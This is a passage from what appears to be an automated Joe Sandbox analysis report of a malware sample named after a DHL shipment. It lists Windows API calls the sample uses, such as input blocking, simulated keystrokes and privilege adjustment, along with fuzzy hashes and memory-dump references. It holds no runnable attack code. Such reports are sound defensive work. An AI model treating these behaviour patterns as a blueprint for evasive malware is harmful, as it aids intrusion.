                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Variable is not of type 'Object'.$p#
                                                                                      • API String ID: 0-1086706999
                                                                                      • Opcode ID: c4082923e870fd39d704f747571c2395d086a49eb1ec43248e32e8ed9b2b4c5a
                                                                                      • Instruction ID: c48620032df288a9e69c6cedbb703242eb4fa0a43a3785640cb5bcd65ae3aa98
                                                                                      • Opcode Fuzzy Hash: c4082923e870fd39d704f747571c2395d086a49eb1ec43248e32e8ed9b2b4c5a
                                                                                      • Instruction Fuzzy Hash: 02327970910218DFCF14DF94C980AEDBBB5FF06324F189059E946AB292DB75AE46CB70
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00E16918
                                                                                      • FindClose.KERNEL32(00000000), ref: 00E16961
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$CloseFileFirst
                                                                                      • String ID:
                                                                                      • API String ID: 2295610775-0
                                                                                      • Opcode ID: 624631b2d3cfbcc27d60ed4c7137fa9860f937fc30ceba492bcb373aa7e76789
                                                                                      • Instruction ID: af7955df4f15386fd6391d09cdf1427beb4dad640d68e8e569d05c4fda79cd9a
                                                                                      • Opcode Fuzzy Hash: 624631b2d3cfbcc27d60ed4c7137fa9860f937fc30ceba492bcb373aa7e76789
                                                                                      • Instruction Fuzzy Hash: 721190716146109FC710DF29D888A16BBE5FF85328F14C699E8699F2A2C730EC45CBA1
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00E24891,?,?,00000035,?), ref: 00E137E4
                                                                                      • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00E24891,?,?,00000035,?), ref: 00E137F4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFormatLastMessage
                                                                                      • String ID:
                                                                                      • API String ID: 3479602957-0
                                                                                      • Opcode ID: 3d574987e72ba131ec832ed86b51b529a2a4cbe9662a42b129a46f6bfa4529fd
                                                                                      • Instruction ID: ef405d07b601ca1fda80bceb79e8bcbb7c870d822478bb72d812cd7cc00d8039
                                                                                      • Opcode Fuzzy Hash: 3d574987e72ba131ec832ed86b51b529a2a4cbe9662a42b129a46f6bfa4529fd
                                                                                      • Instruction Fuzzy Hash: A9F0A0B16042282AE62027B68C4DFEB7AAEEF85761F000176B509F2291D960994487B0
                                                                                      APIs
                                                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00E0B25D
                                                                                      • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00E0B270
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: InputSendkeybd_event
                                                                                      • String ID:
                                                                                      • API String ID: 3536248340-0
                                                                                      • Opcode ID: feef35b030a5defbfe237d8700b84f5ab96dfec419911b5d0b5d94ae7f470cb5
                                                                                      • Instruction ID: c22010f879f744067c731708c5ef01cab0fe4d76b60983d53ed3782b2d60e6a4
                                                                                      • Opcode Fuzzy Hash: feef35b030a5defbfe237d8700b84f5ab96dfec419911b5d0b5d94ae7f470cb5
                                                                                      • Instruction Fuzzy Hash: 32F01D7180424EAFDB059FA1C805BEE7FB4FF08309F10900AF955B51A1C379C6559F94
                                                                                      APIs
                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E011FC), ref: 00E010D4
                                                                                      • CloseHandle.KERNEL32(?,?,00E011FC), ref: 00E010E9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                                                      • String ID:
                                                                                      • API String ID: 81990902-0
                                                                                      • Opcode ID: 22ce4d403be3c3c83db7e8739ec6f6f5123872b20f0b163f0da472adbcf31c26
                                                                                      • Instruction ID: 4401d73f3755e7e912446ac5ce1e65528869c4b43298fc87b6f5fbcab046ccb5
                                                                                      • Opcode Fuzzy Hash: 22ce4d403be3c3c83db7e8739ec6f6f5123872b20f0b163f0da472adbcf31c26
                                                                                      • Instruction Fuzzy Hash: FBE0BF72018610EEE7252B51FC09EB77BE9EB04310F24886DF5A6944B5DB62ACA0DB60
                                                                                      APIs
                                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00DD6766,?,?,00000008,?,?,00DDFEFE,00000000), ref: 00DD6998
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionRaise
                                                                                      • String ID:
                                                                                      • API String ID: 3997070919-0
                                                                                      • Opcode ID: 8f5fae307ff53aaf4cfb55851413f2c361a8365dac30e8db35c8e70271e39d57
                                                                                      • Instruction ID: 5271265e494beb98268a852e84d995219e10829313e45c75f7d83f10c116b2b3
                                                                                      • Opcode Fuzzy Hash: 8f5fae307ff53aaf4cfb55851413f2c361a8365dac30e8db35c8e70271e39d57
                                                                                      • Instruction Fuzzy Hash: FCB148316106099FD719CF28C48AB657BE0FF45364F29865AE8D9CF3A2C335E985CB90
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID: 0-3916222277
                                                                                      • Opcode ID: 7d9f243a4cf490ef519f37e1d45eaf020f01de94938380e1bf38a36b690c85db
                                                                                      • Instruction ID: f4637cadb1d539d3cb07b7f0651101ccc5644528c6cf5a30ff646dd3e2c849b5
                                                                                      • Opcode Fuzzy Hash: 7d9f243a4cf490ef519f37e1d45eaf020f01de94938380e1bf38a36b690c85db
                                                                                      • Instruction Fuzzy Hash: 58124F71900229DFCB24CF58C8806FEB7F5FF48710F15819AE94AEB251DB709A85DBA1
                                                                                      APIs
                                                                                      • BlockInput.USER32(00000001), ref: 00E1EABD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: BlockInput
                                                                                      • String ID:
                                                                                      • API String ID: 3456056419-0
                                                                                      • Opcode ID: 06a1b1f424b4831fc386ce996ddd127ced4977ceb85d0f2c8d3214971f530423
                                                                                      • Instruction ID: edfdec75f51fbc4a9b7906d3535f01dcd773e91805dec382d5448c5fc4a69a09
                                                                                      • Opcode Fuzzy Hash: 06a1b1f424b4831fc386ce996ddd127ced4977ceb85d0f2c8d3214971f530423
                                                                                      • Instruction Fuzzy Hash: 45E012312102049FC710DF59D405D9AB7D9FF99770F009416FC45D7351D670E8418BA1
                                                                                      APIs
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,00DC03EE), ref: 00DC09DA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                      • String ID:
                                                                                      • API String ID: 3192549508-0
                                                                                      • Opcode ID: e2c65098ee22e7f9032aed60c4d135f5a5ff7cf5302d1c5176fc2165e851ee6f
                                                                                      • Instruction ID: 077aa4e5ca2a7d0961c598a72bd38f2733319bc3484ace5ffcb6fd596289610f
                                                                                      • Opcode Fuzzy Hash: e2c65098ee22e7f9032aed60c4d135f5a5ff7cf5302d1c5176fc2165e851ee6f
                                                                                      • Instruction Fuzzy Hash:
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0
                                                                                      • API String ID: 0-4108050209
                                                                                      • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                      • Instruction ID: 08e3c4b440333a6127c280463f5bb45b0c3220a7ddd148a95efb8d00f9b654e0
                                                                                      • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                      • Instruction Fuzzy Hash: A151677160C7075BDF388568885AFBE2799DF12340F5C060DEA86D7282CA21DE02EF72
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0&
                                                                                      • API String ID: 0-2523485602
                                                                                      • Opcode ID: 12f3384c890931e5dcf1a8cc5e4a905cc7afb8a3c18938652142926918026824
                                                                                      • Instruction ID: aee82a5adef8795560856ba42754d9f5952d5654683c0cbf16abe62d044dd27f
                                                                                      • Opcode Fuzzy Hash: 12f3384c890931e5dcf1a8cc5e4a905cc7afb8a3c18938652142926918026824
                                                                                      • Instruction Fuzzy Hash: 2321C3322206118BDB28CE79C8226BA73E5A754310F14862EE5A7E37D1DE39A944CB90
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7fd70dd7a40e92f3bfaefd92cbf8659a1319d02f0944c381b454a6018a4456bc
                                                                                      • Instruction ID: 9690f7c0e2bb65d9adf50dc670f41b09fc50e65c90714702001e5a660b2bb7ff
                                                                                      • Opcode Fuzzy Hash: 7fd70dd7a40e92f3bfaefd92cbf8659a1319d02f0944c381b454a6018a4456bc
                                                                                      • Instruction Fuzzy Hash: 55325626D29F014DD7239639DC22335A689AFB73C5F55D73BF81AB5AA6EB28C4C34100
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: abeabae3535f41db37cfedafd2d6d6bcdf666dea581804c8f9f89099f2562560
                                                                                      • Instruction ID: acbd535803ef5b95d13d660951751869d3812f58a1d4e21666164617cadb60c1
                                                                                      • Opcode Fuzzy Hash: abeabae3535f41db37cfedafd2d6d6bcdf666dea581804c8f9f89099f2562560
                                                                                      • Instruction Fuzzy Hash: D0320731A2410DCBCF24CB29C6906BE7BA1FB45300F2EE566D69ADB291D630DD91DB70
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 87805a9e768d7892233429b13257abd36df624dffb90e3e0daa2a2640e201431
                                                                                      • Instruction ID: d6a6dcf4e9948749f87b83d506845ea6023bf32da0d374163a351c49d3982629
                                                                                      • Opcode Fuzzy Hash: 87805a9e768d7892233429b13257abd36df624dffb90e3e0daa2a2640e201431
                                                                                      • Instruction Fuzzy Hash: 1022DFB0A0060ADFDF14DF69D881AAEB3F5FF45344F144229E856A7291EB35E910CB70
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ec815243e1671eacedd35171b2a6fb1ac3577b87b3073defa53b14a3fd13180e
                                                                                      • Instruction ID: f68527fef743cce5b37441e79573fb1d7748b5447aba8ae0066f931ce516f7fb
                                                                                      • Opcode Fuzzy Hash: ec815243e1671eacedd35171b2a6fb1ac3577b87b3073defa53b14a3fd13180e
                                                                                      • Instruction Fuzzy Hash: BD02B6B0A00205EFDB04EF65D881AAEB7B5FF44300F548169F8569B291EB31EE15CBA5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                      • Instruction ID: f63cbb4b7069edfcb8e4b425f41819e3d6d6d48506defa13170c7df8e2ec6a52
                                                                                      • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                      • Instruction Fuzzy Hash: F59165761080B34ADB29463A8574A7DFFE15A933A131E079DE4F3CB1C2EE20C969D630
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                      • Instruction ID: 112824f65b667d9c8f40fd614464d20acd2a3bf6a6b3b8be752736629b886bb8
                                                                                      • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                      • Instruction Fuzzy Hash: C691347A2090B349DB2D467A8574A3DFFE15A933A131E079DD4F2CB1C2FD24C9699A30
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 05c70dc5e8fea14cc072751cd6d8562b58c10847fcc1043a757002f831ba0b6a
                                                                                      • Instruction ID: b533b0f33a08db80ac92befa3fd7b0e7b5d20f2558c54baa6dbe3a90468fa850
                                                                                      • Opcode Fuzzy Hash: 05c70dc5e8fea14cc072751cd6d8562b58c10847fcc1043a757002f831ba0b6a
                                                                                      • Instruction Fuzzy Hash: 1E61487160870BA6DF349A288995FBE2396DF41710F28091EE886DB281DA21DE42DF75
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0901028c12d368bc1a73691163f9708e9295f903eb902114f3fede839560a4c9
                                                                                      • Instruction ID: 600b2c9dd09b6219525dd810c4c9b0e1afc63648a035ef2496288b75e259fe30
                                                                                      • Opcode Fuzzy Hash: 0901028c12d368bc1a73691163f9708e9295f903eb902114f3fede839560a4c9
                                                                                      • Instruction Fuzzy Hash: 9F617B7260870BE7DE385A684856FBF2398EF41740F18095DF883DB281DA22DD42DE75
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
